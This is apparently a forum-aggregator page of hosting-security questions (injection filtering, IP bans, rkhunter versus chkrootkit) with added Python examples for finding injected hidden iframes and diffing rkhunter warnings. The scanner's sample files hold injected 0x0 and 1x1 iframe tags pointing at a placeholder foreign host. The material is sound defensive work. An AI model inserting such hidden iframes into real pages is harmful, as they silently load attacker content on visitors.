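The posts above (the 0x0 iframe in the first thread, the unquoted 1x1 iframe on the cPanel server, the footer iframe that was not in the footer file, and the question here about cleaning) all describe the same artefact: a near-invisible iframe whose src points at a foreign host. This added example, not code from any of the posts, scans a web root for that pattern so every touched file is known before cleanup; the sample site, its file names and the hosts injected.example and www.example.com are constructed placeholders.

```python
"""Find injected hidden iframes under a web root.

Added example, not code from any of the posts: the tags quoted in the threads are
near-invisible iframes (0x0 or 1x1, or hidden by style) whose src points at a foreign
host; scan_tree() reports every file containing one, so nothing is missed at cleanup.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name=value pairs; the value may be double-quoted, single-quoted or bare (WIDTH=0).
ATTR_RE = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def parse_attrs(attr_text):
    """Attribute text of one tag -> dict keyed by lowercase attribute name."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        name, dq, sq, bare = m.groups()
        attrs[name.lower()] = dq if dq is not None else sq if sq is not None else bare
    return attrs


def _px(attrs, name):
    """Numeric width/height, or None when absent, a percentage or garbage."""
    value = attrs.get(name, "").strip().lower()
    value = value[:-2] if value.endswith("px") else value
    try:
        return float(value)
    except ValueError:
        return None


def suspicion_reasons(attrs, own_hosts):
    """Reasons an <iframe> looks injected; an empty list means it looks normal."""
    reasons = []
    w, h = _px(attrs, "width"), _px(attrs, "height")
    if w is not None and h is not None and w <= 1 and h <= 1:
        reasons.append("size %gx%g" % (w, h))
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("hidden by style")
    host = urlparse(attrs.get("src", "")).hostname
    if host and host not in own_hosts:
        reasons.append("external src host " + host)
    return reasons


def scan_text(text, own_hosts):
    """[(line_number, src, reasons)] for every suspicious iframe in text."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        reasons = suspicion_reasons(attrs, own_hosts)
        if reasons:
            hits.append((text.count("\n", 0, m.start()) + 1, attrs.get("src", ""), reasons))
    return hits


def scan_tree(root, own_hosts, exts=(".html", ".htm", ".php", ".js", ".tpl")):
    """{relative_path: hits} for the files under root that contain suspicious iframes."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read(), own_hosts)
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed sample site (placeholder hosts, not the ones named in the threads):
# one legitimate embed, one 0x0 injected tag, one unquoted 1x1 tag as in the cPanel post.
SAMPLE_FILES = {
    "index.html": "<html><body>hello</body></html>\n<iframe src='http://injected.example/go.php?sid=1'"
                  " style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 SCROLLING=no></iframe>\n",
    "inc/footer.php": "<?php echo 'footer'; ?>\n<iframe width=1 height=1 src=http://injected.example/x></iframe>\n",
    "about.html": '<iframe src="https://www.example.com/embed" width="600" height="400"></iframe>\n',
}


def demo():
    """Write the sample site to a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, own_hosts={"www.example.com"})
```

The scan only finds what is on disk; when the tag is absent from every file but still served (as in the "footer" thread), the injection is in a layer the scan does not see, such as Apache configuration, a PHP auto_prepend/append setting, or a compromised include outside the web root, and those need checking separately.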

Does CISCO ASA Firewall Block SQL And XSS Injection?

Dec 25, 2008

Does CISCO ASA Firewall block SQL and XSS Injection? If not, then which are the firewalls available which do this job. I have checked web application firewalls and found them to be too costly for my budget. What are the other cheap options available?


Win 2003 + Mssql Attacks Injection

Jun 2, 2008

I see on one server with Windows 2k3 and SQL 2000 a lot of injection attempts (lucky so far) and 90% come from China.

Is there any way on iis6 to put range ban like 123.52.0.0 - 123.55.255.255 so to ban all that network?


CHKROOTKIT Or RKHunter

Jul 29, 2009

Which of these is better?

CHKROOTKIT or RKHunter?

I want to install and run it via SSH.


Rkhunter & Chkrootkit?

Jun 30, 2008

I've honestly never had to worry about protecting myself from exploits until this week, when I found out somebody gained access to the server using an old script on an old account (teach me to delete client accounts when they leave me, it did!)

I'm working on a new server and going through lots of posts on better securing it, and two things that are suggested is installing chkrootkit and rkhunter, and adding them to the daily cron jobs. Learned how to install and set up the daily script for chkrootkit, but here's what I'd like to do that I'm not sure how to go about, I'd like to a) be notified ONLY if there are changes in the daily scans (especially since there are a couple of false positives I'm aware of) and b) be e-mailed a full report once a week, whether or not there were any changes.

I've got rkhunter installed as well, but I can't seem to find a script that will properly execute it and e-mail it to me. Does anybody have one that works? I'd also like to only get an e-mail if there are changes, except for a once weekly scan result.

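An added example, not rkhunter's code nor any poster's, covering the rkhunter threads above: it groups the warning lines quoted in the "Rkhunter 1.3.0 Warnings", "Rkhunter" and "Rkhunter Log" posts by category with the check a defender makes before whitelisting each, and gives the "notify me only on changes" behaviour asked for in this last post by diffing two runs' warning records. PREVIOUS_RUN and CURRENT_RUN are constructed from those quoted lines only.

```python
"""Triage rkhunter warnings and flag only those new since the previous run.

Added example (not rkhunter's code nor any poster's): the warning lines below are
copied from the rkhunter output quoted in the threads; triage() groups them by
category with the check a defender makes before whitelisting, and new_warnings()
gives the "notify me only on changes" behaviour asked for in the last post.
"""
import re

# Constructed previous/current runs built from the quoted warnings (no other host data).
PREVIOUS_RUN = """\
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa
Warning: The SSH configuration option 'PermitRootLogin' has not been set.
The default value may be 'yes', to allow root access.
Warning: Application 'openssl', version '0.9.7a', is out of date, and possibly a security risk.
"""
CURRENT_RUN = PREVIOUS_RUN + """\
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Possible promiscuous interfaces:
'ifconfig' command output: UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
'ip' command output: eth0
"""

# (category, pattern capturing the subject) tried in order; first match wins.
RULES = [
    ("replaced_by_script", re.compile(r"The command '([^']+)' has been replaced by a script")),
    ("xinetd_service", re.compile(r"Found enabled xinetd service: (\S+)")),
    ("ssh_config", re.compile(r"The SSH configuration option '([^']+)'")),
    ("hidden_file", re.compile(r"Hidden file found: ([^:]+):")),
    ("outdated_app", re.compile(r"Application '([^']+)', version '([^']+)', is out of date")),
    ("promiscuous_interface", re.compile(r"'ip' command output: (\S+)")),
]

# What to verify before silencing a category; the rkhunter.conf option comes last.
NEXT_STEP = {
    "replaced_by_script": "confirm the script is the package's own (rpm -Vf PATH); then SCRIPTWHITELIST",
    "xinetd_service": "confirm the service is meant to be on; then XINETD_ALLOWED_SVC",
    "ssh_config": "set the option explicitly in sshd_config (PermitRootLogin no)",
    "hidden_file": "inspect the file and its owning package; then ALLOWHIDDENFILE",
    "outdated_app": "update the package, or APP_WHITELIST if the vendor backports fixes",
    "promiscuous_interface": "find what set PROMISC (a sniffer?); ALLOWPROMISCIF only if expected",
}


def split_warnings(log_text):
    """One record per warning; lines not starting with 'Warning:' continue the previous one."""
    records = []
    for line in log_text.splitlines():
        if line.startswith("Warning:"):
            records.append(line[len("Warning:"):].strip())
        elif records and line.strip():
            records[-1] += "\n" + line.strip()
    return records


def classify(record):
    """(category, [subject, ...]) for one warning record."""
    for category, rx in RULES:
        found = rx.findall(record)
        if found:
            return category, [" ".join(f) if isinstance(f, tuple) else f for f in found]
    return "other", [record.splitlines()[0]]


def triage(log_text):
    """{category: [subjects]} over a whole run."""
    grouped = {}
    for record in split_warnings(log_text):
        category, subjects = classify(record)
        grouped.setdefault(category, []).extend(subjects)
    return grouped


def new_warnings(previous_log, current_log):
    """Warning records present in the current run but absent from the previous one."""
    seen = set(split_warnings(previous_log))
    return [record for record in split_warnings(current_log) if record not in seen]


def change_report(previous_log, current_log):
    """Lines for a change-only notification: each new warning with its next step."""
    lines = []
    for record in new_warnings(previous_log, current_log):
        category, subjects = classify(record)
        lines.append("%s: %s -> %s" % (category, ", ".join(subjects), NEXT_STEP.get(category, "investigate")))
    return lines
```

In a cron job, keep each run's warning output (rkhunter's --report-warnings-only option gives just those lines) and feed the previous and current files to change_report(); an empty result means no mail, and the weekly full report is simply the current file sent unchanged.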

Copyrights 2005-15 www.BigResource.com, All rights reserved